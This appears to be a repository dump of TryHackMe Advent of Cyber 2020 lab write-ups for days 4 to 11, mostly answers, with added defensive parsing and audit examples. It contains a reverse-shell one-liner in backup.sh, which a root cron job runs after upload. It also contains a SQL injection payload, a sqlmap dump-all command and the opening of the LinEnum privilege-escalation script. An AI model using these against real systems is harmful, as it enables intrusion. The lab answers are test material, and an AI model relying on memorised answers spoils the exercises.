FILE: Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py
================================================
#!/usr/bin/python3
'''
@author edoardottt
'''
starting_year = 2010
current_year = 2020


def pad_number(inp, length):
    # Left-pad a number with zeros to the requested width (e.g. 3 -> "03").
    if len(str(inp)) == length:
        return str(inp)
    return (length - len(str(inp))) * "0" + str(inp)


# Write every YYYYMMDD combination in range, one per line. Impossible dates
# such as 20200231 are included; they only cost one extra request each and
# are dropped by the --hw 0 filter together with the other wrong dates.
with open("YYYYMMDD-list.txt", "w+") as f:
    for y in range(starting_year, current_year + 1):
        for m in range(1, 13):
            for d in range(1, 32):
                f.write(pad_number(y, 4) + pad_number(m, 2) + pad_number(d, 2) + "\n")
================================================
FILE: Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md
================================================
# Day 5 - Someone stole Santa's gift list!
- Without using directory brute forcing, what's Santa's secret login panel?
- You don't need a directory fuzzer here, because you will not find a wordlist containing this word.
- `santapanel`
You will see this page:

- Visit Santa's secret login panel and bypass the login using SQLi
no answer needed
- Just enter `' OR true --` in the username field.
- How many entries are there in the gift database?
- `(' OR true --`
- `22`
- What did Paul ask for?
- `github ownership`
- What is the flag?
- You have to enable the Burp proxy option in FoxyProxy.
- Then, open BurpSuite and perform a single search request from the text field.
- You will see the HTTP request captured in BurpSuite. Send it to Repeater and save the item as shown in the explanation preceding the CTF.
- Then start sqlmap with `sqlmap -r request.txt --tamper=space2comment --dump-all --dbms sqlite`, where request.txt is the file you saved from BurpSuite.
- (If sqlmap asks you something, go for the most thorough attack it offers, answering y or n accordingly.)
- `thmfox{***_*_****_***_*********_**_***}`
- What is the admin password?
- `****************`
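Added example, not the panel's own code: the login and search queries rebuilt on Python's sqlite3 (the write-up passes `--dbms sqlite` to sqlmap), string-built beside parameterized, so the `' OR true --` payload can be seen succeeding against one form and failing against the other. Table contents are constructed.

```python
import sqlite3

# The payload the write-up types into the username field.
SQLI_PAYLOAD = "' OR true --"


def build_db():
    """In-memory stand-in for the panel's SQLite database; rows are constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    con.execute("CREATE TABLE gifts (kid TEXT, gift TEXT)")
    con.executemany("INSERT INTO gifts VALUES (?, ?)",
                    [("Paul", "github ownership"), ("Amy", "bike"), ("Tom", "train")])
    return con


def login_vulnerable(con, username, password):
    """String-built query. With the payload, the quote closes the literal,
    `OR true` matches every row and `--` comments out the password check."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchall()


def login_parameterized(con, username, password):
    """Same query with bound parameters: the payload is compared as plain text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


def search_vulnerable(con, kid):
    """The gift search box, string-built; the same payload returns every entry,
    which is how the write-up counts the gift database."""
    sql = f"SELECT kid, gift FROM gifts WHERE kid LIKE '%{kid}%'"
    return con.execute(sql).fetchall()


def search_parameterized(con, kid):
    """Wildcards are concatenated in SQL around a bound parameter, so user
    input can never become query syntax."""
    sql = "SELECT kid, gift FROM gifts WHERE kid LIKE '%' || ? || '%'"
    return con.execute(sql, (kid,)).fetchall()
```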
# see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md
================================================
# Day 6 - Be careful with what you wish on a Christmas night
- Deploy your AttackBox (the blue "Start AttackBox" button) and the task's machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machine's IP (http://<TARGET_IP>:5000) into the browser address bar (the webserver is running on port 5000, so make sure this is included in your web requests).
no answer needed

- What vulnerability type was used to exploit the application?
- `stored crosssite scripting`
- What query string can be abused to craft a reflected XSS?
- If you search for anything in the first search bar, you will see a new query parameter appended to the URL.
- `q`
- Launch the OWASP ZAP Application
no answer needed
- Run a ZAP (zaproxy) automated scan on the target. How many alerts does it display?
- `5`
- How many types of XSS are there in the scan?
- `2`
- Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?
no answer needed
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/%2f
================================================
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>TBFC's Internal Blog</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link
rel="alternate"
type="application/rss+xml"
href="http://tbfc.blog/index.xml"
title="TBFC's Internal Blog"
/>
<link rel="stylesheet" href="http://tbfc.blog/fontawesome/css/all.min.css" />
<link
id="dark-mode-theme"
rel="stylesheet"
href="http://tbfc.blog/css/dark.css"
/>
<script>
var darkTheme = document.getElementById('dark-mode-theme')
var storedTheme = localStorage.getItem('dark-mode-storage')
if (storedTheme === 'dark') {
darkTheme.disabled = false
} else if (storedTheme === 'light') {
darkTheme.disabled = true
}
</script>
<script src="http://tbfc.blog/js/bundle.js"></script>
<script src="http://tbfc.blog/js/instantpage.min.js" type="module" defer></script>
<meta name="generator" content="Hugo 0.78.2" />
</head>
<body>
<header>
<nav class="navbar">
<div class="nav">
<a href="http://tbfc.blog/" class="nav-logo">
<img
src="http://tbfc.blog/images/icon.png"
width="50"
height="50"
alt="Logo"
/>
</a>
<ul class="nav-links">
<li>
<a href="/tags" id="Tags"
><em class="fas fa-tag fa-lg"></em
></a>
</li>
<li>
<a href="/categories" id="Category"
><em class="fas fa-folder-open fa-lg"></em
></a>
</li>
<li>
<a href="/search" id="Search"
><em class="fas fa-search fa-lg"></em
></a>
</li>
</ul>
</div>
</nav>
<div class="intro-header">
<div class="container">
<div class="page-heading">
<h1>
TBFC's Internal Blog
</h1>
</div>
</div>
</div>
</header>
<div class="container" role="main">
<div class="posts-list">
<article class="post-preview">
<a href="http://tbfc.blog/posts/reindeer-of-the-week/">
<h2 class="post-title">Reindeer of the Week</h2>
</a>
<div class="post-entry">
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
<article class="post-preview">
<a href="http://tbfc.blog/posts/meet-the-team/">
<h2 class="post-title">Meet the Team</h2>
</a>
<div class="post-entry">
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
<article class="post-preview">
<a href="http://tbfc.blog/posts/recruitment-drive/">
<h2 class="post-title">Recruitment Drive</h2>
</a>
<div class="post-entry">
<p>Hey fellow Elves! We’re currently recruiting for the positions listed below. As always, please sned your reccomendations to your workshop manager - any successful referer will receieve a $150 bonus in their next pay packet.
1x HR Manager: We are seeking a new Elf McKaren. All applications must have 3 years prior experience in a similar role and be able to work under crunch time.
4x Stocking Fillers Our dispatch team is looking for new fresh-faces to bolster the ranks of fellow stocking fillers.</p>
<a href="http://tbfc.blog/posts/recruitment-drive/" class="post-read-more"
>Read More</a
>
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
</div>
</div>
<footer>
<div class="container">
<p class="credits copyright">
<a href="http://tbfc.blog/about">Elf McEager</a>
©
2020
/
<a href="http://tbfc.blog/">TBFC's Internal Blog</a>
–
<em class="fas fa-moon" id="dark-mode-toggle"></em>
</p>
<p class="credits theme-by">
Powered By <a href="https://gohugo.io">Hugo</a>
Theme
<a href="https://github.com/matsuyoshi30/harbor">Harbor</a>
</p>
</div>
</footer>
</body>
</html>
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md
================================================
# The Grinch Really Did Steal Christmas
Download the ZIP file "aocpcaps.zip" that is attached to this task, then use a combination of the Wireshark filters and features we've covered to answer the questions below:
- Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?
- `10.11.3.2`
- If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?
- `http.request.method == "GET"` (the comparison is case-sensitive, so a lowercase `get` matches nothing)
- Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.199" visited?
- `reindeer-of-the-week`
- Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?
There's a lot of irrelevant data here - Using a filter here would be useful!
- `*********_********_******`
- Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?
- `ssh`
- Analyse "pcap3.pcap" and recover Christmas!
What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
- `Rubber ducky`
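The three pcap1/pcap2 questions above are the same extraction tasks Wireshark does with `icmp.type == 8`, `http.request.method == "GET"` and `ftp.request.command == "PASS"`. The script below, an added example that is not part of the room or this repository, answers them from a classic pcap with nothing but the standard library. The capture it reads is constructed in memory (the addresses mirror the room's, the FTP username `elf` and password are made up), and only Ethernet/IPv4 with ICMP or TCP is parsed; transport-layer checksums are left at zero because the reader never verifies them. To run it against the real files, pass the bytes of `pcap1.pcap` or `pcap2.pcap` to the same functions.

```python
"""Minimal classic-pcap reader answering the Day-07 questions. Added example, not the
room's or repo's code; the capture is constructed in memory, pcapng is not handled."""
import struct
from typing import Dict, Iterator, List, Tuple

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1
ETH_HDR = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
_ip2b = lambda ip: bytes(int(o) for o in ip.split("."))
_b2ip = lambda b: ".".join(str(o) for o in b)


def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """IPv4 header without options, with a correct one's-complement header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                      64, proto, 0, _ip2b(src), _ip2b(dst))
    total = sum(struct.unpack("!10H", hdr))
    while total >> 16:                      # fold the carries
        total = (total & 0xFFFF) + (total >> 16)
    return hdr[:10] + struct.pack("!H", (~total) & 0xFFFF) + hdr[12:] + payload


def _icmp(src: str, dst: str, icmp_type: int) -> bytes:
    return _ipv4(src, dst, 1, struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + b"ping")


def _tcp(src: str, sport: int, dst: str, dport: int, data: bytes) -> bytes:
    # data offset 5 (0x50), flags PSH|ACK (0x18), window 0xFFFF, checksum 0, urgent 0
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 0xFFFF, 0, 0)
    return _ipv4(src, dst, 6, tcp + data)


def build_sample_pcap() -> bytes:
    """Constructed capture: one ping exchange, one HTTP GET and a cleartext FTP login."""
    packets = [
        _icmp("10.11.3.2", "10.10.67.199", 8),          # echo request: the initiator
        _icmp("10.10.67.199", "10.11.3.2", 0),          # echo reply: not an initiator
        _tcp("10.10.67.199", 51234, "10.11.3.2", 80,
             b"GET /posts/reindeer-of-the-week/ HTTP/1.1\r\nHost: tbfc.blog\r\n\r\n"),
        _tcp("10.10.67.199", 51300, "10.11.3.2", 21, b"USER elf\r\n"),
        _tcp("10.11.3.2", 21, "10.10.67.199", 51300, b"331 Please specify the password.\r\n"),
        _tcp("10.10.67.199", 51300, "10.11.3.2", 21, b"PASS constructed-example-pass\r\n"),
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, pkt in enumerate(packets):
        frame = ETH_HDR + pkt
        out += struct.pack("<IIII", 1606300000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_packets(pcap: bytes) -> Iterator[Dict]:
    """Yield a dict per IPv4 packet: src, dst, proto, then icmp_type or sport/dport/payload."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(endian + "I", pcap[:4])[0] != PCAP_MAGIC:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if struct.unpack("!H", frame[12:14])[0] != 0x0800:      # skip non-IPv4
            continue
        ip = frame[14:]
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0]
        pkt = {"src": _b2ip(ip[12:16]), "dst": _b2ip(ip[16:20]), "proto": ip[9]}
        l4 = ip[ihl:total_len]
        if pkt["proto"] == 1:
            pkt["icmp_type"] = l4[0]
        elif pkt["proto"] == 6:
            pkt["sport"], pkt["dport"] = struct.unpack("!HH", l4[:4])
            pkt["payload"] = l4[(l4[12] >> 4) * 4:]       # skip the TCP header + options
        yield pkt


def icmp_initiators(pcap: bytes) -> List[str]:
    """Sources of echo requests (type 8), first-seen order. Wireshark: icmp.type == 8"""
    seen: List[str] = []
    for p in iter_packets(pcap):
        if p["proto"] == 1 and p["icmp_type"] == 8 and p["src"] not in seen:
            seen.append(p["src"])
    return seen


def http_get_requests(pcap: bytes) -> List[Tuple[str, str]]:
    """(client, path) per GET. Wireshark: http.request.method == "GET" """
    return [(p["src"], p["payload"].split(b" ", 2)[1].decode())
            for p in iter_packets(pcap)
            if p["proto"] == 6 and p.get("payload", b"").startswith(b"GET ")]


def ftp_credentials(pcap: bytes) -> List[Tuple[str, str]]:
    """USER/PASS pairs matched per client stream. Wireshark: ftp.request.command == "PASS" """
    users: Dict[Tuple[str, int], str] = {}
    creds: List[Tuple[str, str]] = []
    for p in iter_packets(pcap):
        if p["proto"] != 6 or p.get("dport") != 21:
            continue
        line = p["payload"].decode(errors="replace").strip()
        key = (p["src"], p["sport"])                    # one control connection per client
        if line.upper().startswith("USER "):
            users[key] = line[5:]
        elif line.upper().startswith("PASS "):
            creds.append((users.get(key, "?"), line[5:]))
    return creds
```

The FTP function is the security point of pcap2: the control channel carries `PASS` in cleartext, so anyone on the path recovers the login, which is why the encrypted SSH session in the same capture yields nothing to the same treatment.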
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt
================================================
Wish list for Elf McSkidy
-------------------------
Budget: £100
x3 Hak 5 Pineapples
x1 Rubber ducky (to replace Elf McEager)
================================================
FILE: Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md
================================================
# What's under the Christmas Tree?
- When was Snort created?
- A Google search is enough (as always...).
- `1998`
- Using Nmap on <TARGET_IP>, what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)
- `nmap <TARGET_IP>`
- `80,2222,3389`
- Run a scan and provide the -Pn flag to ignore ICMP being used to determine if the host is up
no answer needed
- `nmap -Pn <TARGET_IP>`
- Experiment with different scan settings such as -A and -sV whilst comparing the outputs given.
no answer needed
- `nmap -A <TARGET_IP>`
- `nmap -sV <TARGET_IP>`
- Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?
- `nmap -Pn -sV <TARGET_IP>`
- `Ubuntu`
- Use the Nmap Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?
- `nmap --script=http-title <TARGET_IP>`
- `blog`
- Now use different scripts against the remaining services to discover any further information about them
no answer needed
- `nmap --script=vuln <TARGET_IP>`
- `nmap --script=ssh-auth-methods -p 2222 <TARGET_IP>`
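Reading open ports, `-sV` banners and NSE output off the terminal is fine for one host; for anything larger you want `nmap ... -oX scan.xml` and a parser. The block below is an added example, not part of the room or this repository: it turns nmap's XML into the answers the questions above ask for (ports in ascending comma-separated form, the `http-title` output, and the distribution guess, which without `-O` comes from the `Ubuntu` string that `-sV` finds in service banners). `SAMPLE_NMAP_XML` is constructed to resemble a `nmap -Pn -sV --script=http-title -oX -` run and is not output from the room's target.

```python
"""Parse nmap -oX output into the room's answers. Added example, not the room's or repo's
code; SAMPLE_NMAP_XML is constructed, not a real scan."""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -Pn -sV --script=http-title -oX - TARGET">
<host><status state="up" reason="user-set"/><address addr="10.10.0.1" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/>
  <service name="ms-wbt-server" product="xrdp" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
  <service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" method="probed" conf="10"/>
  <script id="http-title" output="TBFC&apos;s Internal Blog"/></port>
<port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
<port protocol="tcp" portid="2222"><state state="open" reason="syn-ack"/>
  <service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.3" ostype="Linux"
           method="probed" conf="10"/></port>
</ports></host></nmaprun>"""

KNOWN_DISTROS = ("Ubuntu", "Debian", "CentOS", "Red Hat", "Fedora", "Alpine")


def open_ports(xml_text: str) -> List[int]:
    """Ascending list of open ports; filtered and closed ones are dropped."""
    root = ET.fromstring(xml_text)
    return sorted(int(p.get("portid")) for p in root.iter("port")
                  if p.find("state").get("state") == "open")


def answer_format(ports: List[int]) -> str:
    """The room wants 'lowest -> highest, separated by a comma'."""
    return ",".join(str(p) for p in ports)


def services(xml_text: str) -> Dict[int, str]:
    """port -> 'name product version' exactly as -sV reported it."""
    out: Dict[int, str] = {}
    for p in ET.fromstring(xml_text).iter("port"):
        svc = p.find("service")
        if p.find("state").get("state") == "open" and svc is not None:
            out[int(p.get("portid"))] = " ".join(
                v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
    return out


def script_output(xml_text: str, script_id: str) -> Dict[int, str]:
    """port -> output of one NSE script (e.g. http-title) on that port."""
    return {int(p.get("portid")): s.get("output")
            for p in ET.fromstring(xml_text).iter("port")
            for s in p.findall("script") if s.get("id") == script_id}


def guess_distro(xml_text: str) -> str:
    """Without -O the distro leaks through -sV banners (OpenSSH's 'Ubuntu 4ubuntu0.3',
    an extrainfo field); tally mentions across services and return the most common."""
    counts: Dict[str, int] = {}
    for svc in ET.fromstring(xml_text).iter("service"):
        banner = " ".join(svc.get(k, "") for k in ("product", "version", "extrainfo"))
        for distro in KNOWN_DISTROS:
            if distro in banner:
                counts[distro] = counts.get(distro, 0) + 1
    return max(counts, key=counts.get) if counts else "unknown"
```

A banner-based distro guess is only as good as the package vendor's version string, so treat it as a hint and confirm with `-O` (needs root) or once you have a shell.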
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md
================================================
# Anyone can be Santa!
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- Name the directory on the FTP server that has data accessible by the "anonymous" user
- `ftp <TARGET_IP>` and enter `anonymous`
- `public`
- What script gets executed within this directory?
- `backup.sh`
- What movie did Santa have on his Christmas shopping list?
- (ftp) `get shoppinglist.txt`
- `The polar express`
- Re-upload this script to contain malicious data (just like we did in section 9.6). Output the contents of /root/flag.txt!
Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have set up a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
- Put your own TryHackMe IP address (AttackBox or VPN address) in `backup.sh` in place of the listener address (the committed file still has 10.9.126.198).
- On your machine, start the listener before uploading: `nc -lvnp 4444`
- (ftp) `put backup.sh`
- The scheduled job executes the uploaded script with root privileges, so you should get a root shell within a minute.
- `cat /root/flag.txt`
- `THM{****_***_***_**_*****}`
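What makes this work is not FTP itself but the combination of an anonymously writable directory and a privileged scheduled job that executes a script from it. The check below is an added example, not part of the room or this repository: it parses `/etc/crontab`-style lines, finds the script each job runs, and reports every way someone other than the job's user (or root) could change what gets executed. The crontab text and files are constructed in a temporary directory, and the jobs are registered under the current user rather than root so the example runs unprivileged.

```python
"""Audit for the Day-09 setup: a scheduled job running a script others can write.
Added example, not the room's or repo's code; everything is constructed in a temp dir."""
import os
import pwd
import stat
import tempfile
from typing import Dict, List, Tuple


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """(user, command) pairs from /etc/crontab-style lines: m h dom mon dow user command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                    # comment or VAR=value line
        if line.startswith("@"):                        # @reboot / @daily user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def script_path(command: str) -> str:
    """First absolute path in the command: handles 'bash /x.sh' and '/x.sh >/dev/null'."""
    for tok in command.split():
        if tok.startswith("/"):
            return tok
    return ""


def _uid_of(user: str) -> int:
    """Resolve the crontab user field; numeric ids are accepted, unknown names map to -1."""
    if user.isdigit():
        return int(user)
    try:
        return pwd.getpwnam(user).pw_uid
    except KeyError:
        return -1


def hijack_reasons(path: str, run_as: str) -> List[str]:
    """Ways someone other than run_as or root could change what the job executes."""
    trusted = {0, _uid_of(run_as)}
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["script missing: whoever can create it owns the job"]
    reasons = []
    if st.st_uid not in trusted:
        reasons.append(f"owned by uid {st.st_uid}, not {run_as} or root")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable file")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable file")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("world-writable parent directory without sticky bit: file can be replaced")
    return reasons


def audit(crontab_text: str) -> Dict[str, List[str]]:
    """script path -> reasons, for every job whose script can be hijacked."""
    findings: Dict[str, List[str]] = {}
    for user, command in parse_system_crontab(crontab_text):
        path = script_path(command)
        if path:
            reasons = hijack_reasons(path, user)
            if reasons:
                findings[path] = reasons
    return findings


def demo() -> Dict[str, List[str]]:
    """Recreate the Day-09 layout: backup.sh inside a world-writable 'public' FTP directory,
    next to a correctly locked-down script (0755 in a 0755 directory) for contrast."""
    try:
        me = pwd.getpwuid(os.getuid()).pw_name
    except KeyError:                                    # container uid with no passwd entry
        me = str(os.getuid())
    base = tempfile.mkdtemp()
    os.chmod(base, 0o755)
    ftp_public = os.path.join(base, "ftp", "public")
    os.makedirs(ftp_public)
    bad = os.path.join(ftp_public, "backup.sh")
    good = os.path.join(base, "good_backup.sh")
    for p, body in ((bad, "tar -zcvf /tmp/backup.tar.gz /opt/ftp\n"), (good, "true\n")):
        with open(p, "w") as f:
            f.write("#!/bin/bash\n" + body)
    os.chmod(bad, 0o777)            # anonymous upload directory: anyone can overwrite
    os.chmod(ftp_public, 0o777)
    os.chmod(good, 0o755)
    crontab = (f"SHELL=/bin/bash\n"
               f"*/1 * * * * {me} bash {bad}\n"
               f"0 2 * * * {me} {good} >/dev/null 2>&1\n")
    return audit(crontab)
```

The fix on the defending side is the mirror image of the findings: scripts run by cron belong to root with mode 0755, live outside any upload directory, and the FTP tree is mounted or configured so uploads cannot be executed.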
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh
================================================
# replace 10.9.126.198:4444 with your own listener's IP and port (nc -lvnp 4444) before uploading
bash -i >& /dev/tcp/10.9.126.198/4444 0>&1
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh
================================================
#!/bin/bash
# Created by ElfMcEager to backup all of Santa's goodies!
# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";
# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp
# TO-DO: Automate transfer of backups to backup server
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt
================================================
The Polar Express Movie
================================================
FILE: Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md
================================================
# Don't be sElfish!
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the " Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- Using enum4linux, how many users are there on the Samba server?
- `enum4linux -a <TARGET_IP>`
- `3`
- Now how many "shares" are there on the Samba server?
- `4`
- Use smbclient to try to login to the shares on the Samba server (10.10.151.244). What share doesn't require a password?
- `smbclient -N //<TARGET_IP>/<SHARE>` (`-N` suppresses the password prompt, so the share that still lets you in is the one that needs no password)
- `tbfc-santa`
- Log in to this share, what directory did ElfMcSkidy leave for Santa?
- `jingle-tunes`
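A share that opens without a password is one whose `guest ok` (or its synonym `public`) is set to `yes` in `smb.conf`, and `map to guest` in `[global]` decides how wide that door is. The block below is an added example, not part of the room or this repository: it parses an `smb.conf` and lists the guest-accessible shares, which is the server-side view of what `smbclient -N` just found. `SAMPLE_SMB_CONF` is constructed and only reuses the room's share name.

```python
"""Which Samba shares open without a password? Added example, not the room's or repo's
code; SAMPLE_SMB_CONF is constructed."""
import configparser
from typing import List

SAMPLE_SMB_CONF = """[global]
workgroup = TBFC
security = user
map to guest = Bad User

[tbfc-hr]
path = /srv/samba/hr
valid users = @hr
read only = no

[tbfc-santa]
path = /srv/samba/santa
public = yes
browseable = yes

[tbfc-it]
path = /srv/samba/it
guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    # smb.conf values carry % macros (%U, %m) and sometimes repeated keys, so turn off
    # interpolation and strict mode; configparser lower-cases keys, which matches Samba
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def guest_allowed_shares(text: str) -> List[str]:
    """Shares whose 'guest ok' (or the synonym 'public') is on."""
    cp = parse_smb_conf(text)
    shares = []
    for name in cp.sections():
        if name == "global":
            continue
        value = cp[name].get("guest ok", cp[name].get("public", "no"))
        if value.strip().lower() in TRUE_VALUES:
            shares.append(name)
    return shares


def map_to_guest_widens(text: str) -> bool:
    """True when failed logins are mapped to the guest account ('Bad User' maps unknown
    usernames, 'Bad Password' maps any wrong password), so even a mistyped username
    lands on the guest shares. Samba's default is 'Never'."""
    g = parse_smb_conf(text)["global"]
    return g.get("map to guest", "Never").strip().lower() != "never"
```

When auditing a real server, compare this list with `smbclient -L <host> -N` output: a share that is guest-accessible but not browseable still opens if you know its name.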
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt
================================================
Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
================================================
FILE: Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/LinEnum.sh
================================================
#!/bin/bash
#A script to enumerate local information from a Linux host
version="version 0.982"
#@rebootuser
#help function
usage ()
{
echo -e "\n\e[00;31m#########################################################\e[00m"
echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m"
echo -e "\e[00;31m#########################################################\e[00m"
echo -e "\e[00;33m# www.rebootuser.com | @rebootuser \e[00m"
echo -e "\e[00;33m# $version\e[00m\n"
echo -e "\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \e[00m\n"
echo "OPTIONS:"
echo "-k Enter keyword"
echo "-e Enter export location"
echo "-s Supply user password for sudo checks (INSECURE)"
echo "-t Include thorough (lengthy) tests"
echo "-r Enter report name"
echo "-h Displays this help text"
echo -e "\n"
echo "Running with no options = limited scans/no output file"
echo -e "\e[00;31m#########################################################\e[00m"
}
header()
{
echo -e "\n\e[00;31m#########################################################\e[00m"
echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m"
echo -e "\e[00;31m#########################################################\e[00m"
echo -e "\e[00;33m# www.rebootuser.com\e[00m"
echo -e "\e[00;33m# $version\e[00m\n"
}
debug_info()
{
echo "[-] Debug Info"
if [ "$keyword" ]; then
echo "[+] Searching for the keyword $keyword in conf, php, ini and log files"
fi
if [ "$report" ]; then
echo "[+] Report name = $report"
fi
if [ "$export" ]; then
echo "[+] Export location = $export"
fi
if [ "$thorough" ]; then
echo "[+] Thorough tests = Enabled"
else
echo -e "\e[00;33m[+] Thorough tests = Disabled\e[00m"
fi
sleep 2
if [ "$export" ]; then
mkdir $export 2>/dev/null
format=$export/LinEnum-export-`date +"%d-%m-%y"`
mkdir $format 2>/dev/null
fi
if [ "$sudopass" ]; then
echo -e "\e[00;35m[+] Please enter password - INSECURE - really only for CTF use!\e[00m"
read -s userpassword
echo
fi
who=`whoami 2>/dev/null`
echo -e "\n"
echo -e "\e[00;33mScan started at:"; date
echo -e "\e[00m\n"
}
# useful binaries (thanks to https://gtfobins.github.io/)
